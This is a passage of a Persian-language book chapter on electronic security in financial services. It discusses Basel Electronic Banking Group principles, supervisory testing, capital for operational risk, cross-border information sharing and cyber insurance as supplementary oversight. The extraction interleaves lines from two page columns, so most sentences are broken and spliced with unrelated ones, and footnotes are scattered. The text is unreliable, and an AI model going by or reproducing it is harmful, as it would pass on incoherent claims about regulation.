‫ﺷﺮﻛﺘﻬﺎﻱ ﻣﻴﺰﺑﺎﻥ‪ ،‬ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺑﺮﻧﺎﻣﻪﻫـﺎ‪ ،‬ﻧـﺮﻡﺍﻓـﺰﺍﺭ‪،‬‬ ‫ﺩﻳﮕﺮ ﺗﺄﻛﻴﺪ ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻫﻢ ﻫﻨﻮﺯ ﺭﺍﻩ ﺯﻳﺎﺩﻱ ﺗـﺎ‬
‫ﺳﺨﺖﺍﻓﺰﺍﺭ ﻭ ﺗﺄﻣﻴﻦﻛﻨﻨﺪﮔﺎﻥ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻳﺠﺎﺩ ﻛﻨـﺪ ﺗـﺎ‬ ‫ﺍﻳﺠﺎﺩ ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﺍﻋﺘﻤﺎﺩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪.‬‬
‫ﺑﻪ ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﭘﺎﺳﺨﮕﻮ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺭﻛﻦ ﺳﻮﻡ‪:‬‬
‫ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﻧﻈﺎﺭﺕ ﻭ ﺁﺯﻣﻮﻥ‬
‫ﭼﺎﻟﺸﻬﺎﻱ ﻧﻈﺎﺭﺕ ﻭ ﭘﻴﺸﮕﻴﺮﻱ‬
‫ﻛﻤﻴﺘﺔ ﺑﺎﺳﻞ ﺩﺭ ﮔﺮﻭﻩ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ )‪ (EGB‬ﻣﺆﺳـﺴﺔ‬
‫ﻋــﻼﻭﻩ ﺑــﺮ ﻛﻨﺘــﺮﻝ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧــﺖ ﻭ ﻧﻈــﺎﺭﺕ ﺑــﺮ‬
‫ﻧﻈﺎﺭﺕ ﺑﺎﻧﻜﻲ‪ ٤١‬ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﭘﻴﺸﻨﻬﺎﺩ ﺩﺭ ﺯﻣﻴﻨـﻪ ﺍﻓـﺰﺍﻳﺶ‪ ،‬ﺍﻳﺠـﺎﺩ‬
‫ﺍﻧﺘﻘﺎﻝﺩﻫﻨﺪﮔﺎﻥ ﭘﻮﻝ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺻﻼﺡ ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﻗـﺎﻧﻮﻧﻲ‪،‬‬
‫ﺗﻐﻴﻴﺮﺍﺕ ﻳﺎ ﺍﻧﺠﺎﻡ ﺍﺻﻼﺣﺎﺕ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ﺩﺭ ﻧﻈـﺎﺭﺕ ﻭ ﺍﺭﺯﻳـﺎﺑﻲ‬
‫ﻧﻈﺎﺭﺕ‪ ،‬ﻭ ﭘﻴـﺸﮕﻴﺮﻱ‪ ،‬ﺑـﺮﺍﻱ ﺗـﻀﻤﻴﻦ ﺍﻣﻨﻴـﺖ ﺍﺭﺍﺋـﻪﺩﻫﻨـﺪﮔﺎﻥ‬
‫ﺟﻬﺖ ﺗﻄﺒﻴﻖ ﺭﻭﺍﻟﻬﺎ ﺑﺎ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳﺪ ﺷﻜﻞ ﮔﺮﻓﺖ‪ .‬ﺩﺭ ﺳـﺎﻝ‬
‫ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻣﻔﻴﺪ ﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﺑـﻮﻳﮋﻩ ﺑـﺮﺍﻱ ﺷـﺮﻛﺘﻬﺎﻱ‬
‫‪ EBG ،۲۰۰۱‬ﺍﺻــﻮﻝ ﻣــﺪﻳﺮﻳﺖ ﻣﺨــﺎﻃﺮﻩ ﺑــﺮﺍﻱ ﺑﺎﻧﻜــﺪﺍﺭﻱ‬
‫ﺗﺠﺎﺭﻱ ﻛﻪ ﺩﺭ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﺎ ﺍﺭﺍﺋﻪ ﺳﺎﻳﺮ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﻣﻨﺘﺸﺮ ﻛﺮﺩ ﻛﻪ ﺷﺎﻣﻞ ﺍﺻـﻮﻝ ﺧﺎﺻـﻲ ﺑـﻮﺩ ﻛـﻪ‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ ﻓﻌﺎﻝ ﻫﺴﺘﻨﺪ ﻣﻄﺮﺡ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺗﺄﻳﻴﺪ ﺍﻋﺘﺒﺎﺭ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ‪ ،‬ﻛﻨﺘﺮﻟﻬـﺎﻱ‬
‫ﺩﺍﺧﻠــﻲ‪ ،‬ﺟﺎﻣﻌﻴــﺖ ﺍﻣﻨﻴــﺖ ﺳــﺮﻣﺎﻳﻪﻫــﺎ ﻭ ﻫﻤﭽﻨــﻴﻦ ﺟﺎﻣﻌﻴــﺖ‬ ‫ﻧﻴﺎﺯﻫﺎﻱ ﺳﺮﻣﺎﻳﻪﺍﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻋـﻼﻡ ﻣـﻲﻛـﺮﺩ‪ .‬ﺣـﻮﺯﻩﻫـﺎﻱ‬
‫ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﺟﺪﻳﺪ ﺑﺎﺳﻞ‪ ٣٨‬ﺑﺮﺍﻱ ﺳﺮﻣﺎﻳﻪ ‪ -‬ﺑﻮﻳﮋﻩ ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺑـﻪ‬
‫ﻧﻈﺎﺭﺕ ﻭ ﺍﺭﺯﻳﺎﺑﻲ ﺩﺭ ﭼﻨﺪ ﺳﺎﻝ ﺁﻳﻨﺪﻩ ﺗﻐﻴﻴﺮ ﺟﻬﺖ ﻋﻤﺪﻩﺍﻱ ﭘﻴـﺪﺍ‬
‫ﺗﻬﺪﻳﺪﻫﺎﻱ ﻋﻤﻠﻴﺎﺗﻲ ﻣﺮﺑﻮﻁ ﻣﻲﺷﻮﻧﺪ ‪ -‬ﺑـﻪ ﻣﺨـﺎﻃﺮﺓ ﺍﺯ ﺩﺳـﺖ‬
‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺻﻨﻌﺖ ﺍﻣﻨﻴﺖ ﺑﺎ ﻣﻌﺮﻓﻲ ﻭ ﺗﻜﻴﻪ ﺑﺮ ﺍﻧﺒـﻮﻩ‬
‫ﺩﺍﺩﻥ ﺷﻬﺮﺕ ﻳﺎ ﻣﺨﺎﻃﺮﺍﺕ ﺍﺳﺘﺮﺍﺗﮋﻳﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴـﺖ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﻭ ﺍﻳﻨﺘﺮﻧﺖ ﻳﻚ ﺗﻐﻴﻴﺮ ﺍﻟﮕﻮ ﺭﺍ ﺗﺠﺮﺑـﻪ ﻛـﺮﺩ‪،‬‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﭙﺮﺩﺍﺧﺘﻪﺍﻧﺪ‪ .‬ﺍﺯ ﺍﻳﻨﺮﻭ ﺍﻳﻦ ﺳﺆﺍﻝ ﻣﻄﺮﺡ ﻣﻲﺷﻮﺩ ﻛـﻪ‬
‫ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ﻧﻈـﺎﺭﺕ ﺑـﺎﻧﻜﻲ ﻧﻴـﺰ ﺗﻐﻴﻴـﺮ ﻣﺮﻛـﺰ ﺛﻘـﻞ ﺻـﻨﻌﺖ‬
‫ﻭﻗﺘﻲ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﺭﺧـﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺩﻗﻴـﻖ ﻧﻴـﺴﺖ ﻭ‬
‫ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺭﺍ ﺗﺠﺮﺑﻪ ﺧﻮﺍﻫﺪ ﻧﻤﻮﺩ‪.‬‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﺧﺴﺎﺭﺍﺗﻲ ﻛﻪ ﺑﻪ ﺷﻬﺮﺕ ﻭﺍﺭﺩ ﻣـﻲﺷـﻮﺩ ﺳـﺨﺖ ﺍﺳـﺖ‪،‬‬
‫ﻫﻤﺎﻫﻨﮕﻲ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﺭﻭﻥﻣﺮﺯﻱ ﻭ ﺑﺮﻭﻥﻣﺮﺯﻱ‬ ‫ﺑﻬﺘﺮﻳﻦ ﺭﺍﻩ ﺍﻧﺪﺍﺯﻩﮔﻴﺮﻱ ﻣﺨﺎﻃﺮﺍﺕ ﻋﻤﻠﻴﺎﺗﻲ ﺑﺎﻧﻜﻲ ﭼﻴـﺴﺖ؟ ﺑـﺎ‬
‫ﺗﻮﺟﻪ ﺑﻪ ﻣﺴﺌﻠﻪ ﺗﻌﻴﻴﻦ ﺳـﺮﻣﺎﻳﺔ ﻻﺯﻡ ﺑـﺮﺍﻱ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﻣﻨﻴـﺖ‬
‫ﻳﻚ ﻣﻮﺿﻮﻉ ﻛﻠﻴﺪﻱ ﻛﻪ ﺍﻛﺜﺮ ﻛﺸﻮﺭﻫﺎ ﺑﺎ ﺁﻥ ﺭﻭﺑﺮﻭ ﻫﺴﺘﻨﺪ ﻧﻴـﺎﺯ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﻳﻚ ﺭﻭﺵ ﻣﺆﺛﺮ ﻣﻲﺗﻮﺍﻧـﺪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﺭﻭﻧـﺪ‬
‫ﺑﻪ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺗﺒﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ﻣﻴـﺎﻥ ﻗﺎﻧﻮﻧﮕـﺬﺍﺭﺍﻥ ﻭ ﺩﻭﺍﻳـﺮ‬
‫ﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺮﻣﻴﻢ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘـ ﹺ‬
‫ﺍﺟﺮﺍﻱ ﻗـﺎﻧﻮﻥ )ﻧﻴﺮﻭﻫـﺎﻱ ﺍﻧﺘﻈـﺎﻣﻲ( ﺍﺳـﺖ‪ .‬ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺸﻮﺭﻫﺎ‬
‫ﺩﺭ ﻛﻨﺎﺭ ﺍﻳﺠﺎﺩ ﺍﻧﮕﻴﺰﻩﻫﺎﻱ ﺑﻴﺸﺘﺮ ﺑﺮﺍﻱ ﺛﺒـﺖ ﮔﺰﺍﺭﺷـﺎﺕ ﭼﻨـﻴﻦ‬
‫ﻭﻗﺎﻳﻌﻲ ﺑﺎﺷﺪ‪ ٣٩.‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻣﻘﺎﻣﺎﺕ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺭﺍﺋﻪﺩﻫﻨـﺪﮔﺎﻥ‬
‫ﻱ ﺧـﻮﺩ‬
‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ‪ ،‬ﺻﻨﻌﺖ ﺑﻴﻤـﻪ ﺑـﻪ ﺧـﻮﺩ ﹺ‬ ‫‪۴۰‬‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﻴﺎﺯ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﺳﺎﺧﺘﺎﺭ ﻣﺠﺪﺩ ﺑﻴﺎﺑﺪ ﻭ ﺑﻪ ﻳﻚ ﺣﺎﻟـﺖ‬ ‫ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺭﺍ ﺑـﻪ ﺑﻴﻤـﻪ ﻛـﺮﺩﻥ ﺧـﻮﺩ ﺩﺭ ﺑﻌـﻀﻲ ﺍﺯ ﺟﻮﺍﻧـﺐ‬
‫ﺍﺳﺘﻮﺍﺭ ﺑﺮﺳﺪ؛ ﺍﻣﺎ ﺩﺭ ﻫﺮ ﺣﺎﻝ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺍﻳـﻦ ﺷـﺮﺍﻳﻂ ﻧﻴـﺰ ﺟﻠـﻮﮔﻴﺮﻱ‬
‫ﻛﺮﺩ‪.‬‬
‫‪41‬‬ ‫‪Banking‬‬ ‫‪Supervision’s‬‬ ‫‪Electronic‬‬ ‫‪Banking‬‬ ‫‪38‬‬ ‫‪Basel‬‬
‫‪Group‬‬ ‫ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ ﺑﻨﺪ ‪ ۶‬ﻫﻤﻴﻦ ﺧﻼﺻﺔ ﺍﺟﺮﺍﻳﻲ‬ ‫‪۳۹‬‬
‫‪١٣٣‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺳﻴﺎﺳــﺘﻬﺎﻱ ﻣﺨــﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺷــﻮﻧﺪ‪ ،‬ﺍﻳــﻦ ﺩﺳــﺘﻪ ﺍﺯ‬ ‫ﭼﻨﺪﻳﻦ ﺳﺎﺯﻣﺎﻥ ﺑﺮﺍﻱ ﺟﻤـﻊﺁﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻣﻬـﻢ ﺩﺍﺭﻧـﺪ‪ ،‬ﺍﻣـﺎ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﻛﺎﻫﺶ ﺩﺍﺩﻩ ﺑﺎﺷﻨﺪ‪.‬‬ ‫ﻻ ﺍﻃﻼﻋــﺎﺕ ﻣﻴــﺎﻥ ﺍﻳــﻦ ﺳــﺎﺯﻣﺎﻧﻬﺎ ﺑــﺎ ﻳﻜــﺪﻳﮕﺮ ﻳــﺎ ﺑــﺎ‬‫ﻣﻌﻤــﻮ ﹰ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﺮﻭﻥﻣﺮﺯﻱ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷـﺘﻪ ﻧﻤـﻲﺷـﻮﻧﺪ )ﮔـﺎﻫﻲ‬
‫ﺻﻨﻌﺖ ﺑﻴﻤﺔ ﺟﻬﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻧﻴـﺮﻭﻱ ﻣﻬـﻢ ﺑـﺮﺍﻱ‬
‫ﺍﻭﻗﺎﺕ ﺑﻪ ﺩﻻﻳﻞ ﺣﻘﻮﻗﻲ(‪ .‬ﻣﻮﺿﻮﻉ ﺗﺒﺎﺩﻝ ﺍﻃﻼﻋﺎﺕ ﻣﻴﺎﻥ ﺳـﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺗﻐﻴﻴﺮ ﺍﻟﺰﺍﻣﺎﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻜﺎﺭ ﺭﻭﺩ‪ .‬ﺍﻭﻝ ﺍﻳﻨﻜﻪ ﻣﻲﺗﻮﺍﻧـﺪ‬
‫ﺩﺭ ﺍﺑﻌﺎﺩ ﻣﻠﻲ ﻭ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻓﺮﺍﺗﺮ ﺍﺯ ﺩﺍﻣﻨﺔ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺳﺖ‪ .‬ﺩﺭ ﻫﺮ‬
‫ﻣﻮﺟﺐ ﺑﻬﺒﻮﺩ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺣـﺪﺍﻗﻠﻲ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺩﺭ‬
‫ﺻﻮﺭﺕ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺩﻭﻟﺘﻬـﺎ ﺳـﻌﻲ ﺩﺍﺭﻧـﺪ ﺑـﺎ ﺟـﺮﺍﺋﻢ ﻣﻮﺟـﻮﺩ ﺩﺭ‬
‫ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺷﻮﺩ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺻﻨﻌﺖ ﺟﻬﺎﻧﻲ ﺧـﺪﻣﺎﺕ‬
‫ﻣﺤﻴﻂ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻪ ﻣﻘﺎﺑﻠﻪ ﺑﺮﺧﻴﺰﻧﺪ‪ ،‬ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﻭ ﻧﻴـﺰ‬
‫ﻣﺎﻟﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺷﺮﻛﺘﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﻫﻤﻜﺎﺭﻱ ﺑﻴﻦﺍﻟﻤﻠﻠـﻲ ﺩﺭ ﺍﻳـﻦ ﺑﺤـﺚ ﻣﻮﺿـﻮﻋﺎﺗﻲ ﻛﻠﻴـﺪﻱ ﺑـﻪ‬
‫ﻻﻳﻪﺑﻨﺪﻱﺷﺪﻩ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﭘﻴﺸﻨﻴﺎﺯ ﺑﺮﺍﻱ ﺗﺠﺎﺭﺕ ﺗﺤﺮﻳﻚ ﻛﻨـﺪ‪.‬‬
‫ﺣﺴﺎﺏ ﻣﻲﺁﻳﻨﺪ‪.‬‬
‫ﺛﺎﻧﻴﹰﺎ ﺷﺮﻛﺘﻬﺎﻱ ﺑﻴﻤـﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﺯ ﻣﺆﺳـﺴﺎﺕ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ‬
‫ﺑﺨﻮﺍﻫﻨﺪ ﻛﻪ ﺑﻪ ﻓﺮﻭﺷﻨﺪﮔﺎﻧﻲ ﻣﺮﺍﺟﻌـﻪ ﻧﻤﺎﻳﻨـﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﺍﺭﺍﺋـﻪ‬
‫ﺭﻛﻦ ﭼﻬﺎﺭﻡ‪:‬‬
‫ﺧﺪﻣﺎﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺗﺄﻳﻴﺪﺷـﺪﻩ ﻭ ﻗﺎﺑـﻞ‬
‫ﻗﺒﻮﻝ ﺻﻨﻌﺘﻲ ﺑﻬﺮﻩ ﻣﻲﺑﺮﻧﺪ ﺗﺎ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﺣﺘﻤـﺎﻟﻲ ﺭﺍ ﻛـﺎﻫﺶ‬ ‫ﻧﻘﺶ ﺑﻴﻤﺔ ﺧﺼﻮﺻﻲ ﺑﻪ ﻋﻨﻮﺍﻥ‬
‫ﺩﺍﺩﻩ ﺑﺎﺷﻨﺪ‪ .‬ﺛﺎﻟﺜـﹰﺎ ﺷـﺮﻛﺘﻬﺎﻱ ﺑﻴﻤـﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﻗﺎﻧﻮﻧﮕـﺬﺍﺭﺍﻥ ﺭﺍ‬ ‫ﻳﻚ ﺳﻴﺴﺘﻢ ﻧﻈﺎﺭﺕ ﺗﻜﻤﻴﻠﻲ‬
‫ﺗﺮﻏﻴﺐ ﻛﻨﻨﺪ ﺗﺎ ﻣﺆﺳﺴﺎﺕ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺭﺍ ﻣﻠـﺰﻡ ﻧﻤﺎﻳﻨـﺪ ﻛـﻪ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻧﻈﺎﺭﺕﻛﻨﻨﺪﻩ ﺑﺮ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻫﻨﻮﺯ ﺩﺭﺣـﺎﻝ ﺗـﺪﻭﻳﻦ‬


‫ﻛﻴﻔﻴﺖ ﺍﻃﻼﻋـﺎﺕ ﻭ ﮔﺰﺍﺭﺷـﻬﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺭﺧـﺪﺍﺩﻫﺎ ﺭﺍ ﺑﮕﻮﻧـﻪﺍﻱ‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ ﻫﺴﺘﻨﺪ‪ .‬ﺑﻪ ﻋﻠﺖ ﻣﺸﻜﻼﺕ ﺫﺍﺗـﻲ ﻛـﻪ ﺩﺭ‬
‫ﺑﻬﺒﻮﺩ ﺑﺨﺸﻨﺪ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬـﺎ ﺑﺘـﻮﺍﻥ ﺗﺤﻠﻴـﻞ ﺑﻬﺘـﺮﻱ ﺩﺭ‬
‫ﻣﺴﺌﻠﻪ ﻧﻈﺎﺭﺕ ﺑﺮ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﭘﻴﭽﻴﺪﺓ ﻣﺒﺘﻨﻲ ﺑـﺮ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ‬
‫ﻣﻮﺭﺩ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ ﺑﺎﺯﮔـﺸﺖ ﺳـﺮﻣﺎﻳﻪ ﺍﻧﺠـﺎﻡ ﺩﺍﺩ‪.‬‬
‫ﻲ ﻣﺘﻐﻴﺮ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﻳﺎﻓﺘﻦ ﺭﺍﻩﺣﻠﻬﺎﻱ ﺗﻜﻤﻴﻠﻲ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ‬ ‫ﻓﻨ ﹺ‬
‫ﺳﺮﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﻪ ﺻﻨﻌﺖ ﺑﻴﻤﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺭﺍﻩﺣﻠﻬﺎﻳﻲ ﻣﻨﺘﺸﺮ ﻛﻨﺪ ﻛﻪ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺍﺯ ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳـﺖ‪ .‬ﻋﻠﻴـﺮﻏﻢ ﻧﻘـﺎﻳﺺ‬
‫ﺩﺭ ﺁﻧﻬﺎ ﻣﺴﺎﺋﻠﻲ ﭼﻮﻥ ﺑﻪﺍﺷﺘﺮﺍﻙﮔﺬﺍﺭﻱ ﻣﺨﺎﻃﺮﺍﺕ ﻭ ﻣﺴﺌﻮﻟﻴﺖ‪-‬‬
‫ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻃﻼﻋـﺎﺕ ﻻﺯﻡ ﺑـﺮﺍﻱ ﺗﺨﻤـﻴﻦ ﺁﺳـﻴﺒﻬﺎﻱ ﻧﺎﺷـﻲ ﺍﺯ‬
‫ﭘﺬﻳﺮﻱ ﺩﺭ ﻗﺒﺎﻝ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻴـﺎﻥ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﻣﺪﺗﻲ ﺍﺳﺖ ﻛﻪ ﺻـﻨﻌﺖ ﺑﻴﻤـﻪ ﺩﺭ ﺍﻳـﻦ‬
‫ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺳﺎﻳﺮ ﺷﺮﻛﺘﻬﺎﻱ ﻓﻌﺎﻝ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ )ﻣﺜـﻞ‬
‫ﻗﺴﻤﺖ ﻧﻘﺶ ﺍﻳﻔﺎ ﻣﻲﻛﻨﺪ‪ .‬ﭘﻴﺶﺑﻴﻨـﻲ ﻣـﻲﺷـﻮﺩ ﺩﺭ ﭼﻨـﺪ ﺳـﺎﻝ‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﻣﻴﺰﺑﺎﻥ( ﺍﻟﺰﺍﻣﻲ ﺷﻮﺩ‪.‬‬
‫ﺁﻳﻨﺪﻩ ﺗﻨﻬﺎ ﺩﺭ ﺑﺎﺯﺍﺭ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ‪ ،‬ﺭﺷـﺪ ﺑﻴﻤـﺔ ﻣـﺴﺌﻮﻟﻴﺖ ﺩﺭ‬
‫ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﮔـﺴﺘﺮﺓ ﻣﺨـﺎﻃﺮﺍﺕ ﺁﻥ ﺳـﺎﻻﻧﻪ ﺑـﻪ ‪۲،۵‬‬
‫ﺭﻛﻦ ﭘﻨﺠﻢ‪:‬‬
‫ﻣﻴﻠﻴﺎﺭﺩ ﺩﻻﺭ ﺑﺮﺳﺪ‪.‬‬
‫ﮔﻮﺍﻫﻲ‪ ،٤٢‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ‪ ،‬ﻭ‬
‫ﻫﺮﭼﻨﺪ ﺑﻴﻤﺔ ﻣـﺴﺌﻮﻟﻴﺖ ﺩﺭ ﺗﺠـﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ ﻣﺨـﺎﻃﺮﺍﺕ‬
‫ﻧﻘﺶ ﺑﺨﺸﻬﺎﻱ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻫﻨﻮﺯ ﺩﺭ ﻣﺮﺍﺣﻞ ﺍﻭﻟﻴـﺔ ﺗﻮﺳـﻌﻪ ﺍﺳـﺖ‪ ،‬ﺍﻣـﺎ ﺣـﺎﻭﻱ‬
‫ﺑﺨﺸﻬﺎﻱ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ ﺑﺎﻳﺪ ﺑﺎ ﻫﻤﻜﺎﺭﻱ ﻳﻜﺪﻳﮕﺮ ﺑـﺮﺍﻱ‬ ‫ﻣﺸﻜﻼﺗﻲ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑﺎ ﺷﺨﺺ ﺍﻭﻝ ﻭ ﺷﺨﺺ ﺛﺎﻟﺚ ﻣـﻲﺑﺎﺷـﺪ‪.‬‬
‫ﺗﺪﻭﻳﻦ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﻫﻤﺎﻫﻨﮓﺳﺎﺯﻱ ﻃﺮﺣﻬﺎﻱ ﺗﺄﻳﻴﺪ ﻭ ﺍﻋﻄﺎﻱ‬ ‫ﺗﺨﻤﻴﻦ ﻫﺰﻳﻨﺔ ﻣﺨﺎﻃﺮﺍﺕ ﺳﺎﻳﺒﺮ ﺑﺎﻳﺪ ﺗﻮﺳﻌﺔ ﺑﻴﺸﺘﺮﻱ ﭘﻴﺪﺍ ﻛﻨـﺪ‪،‬‬
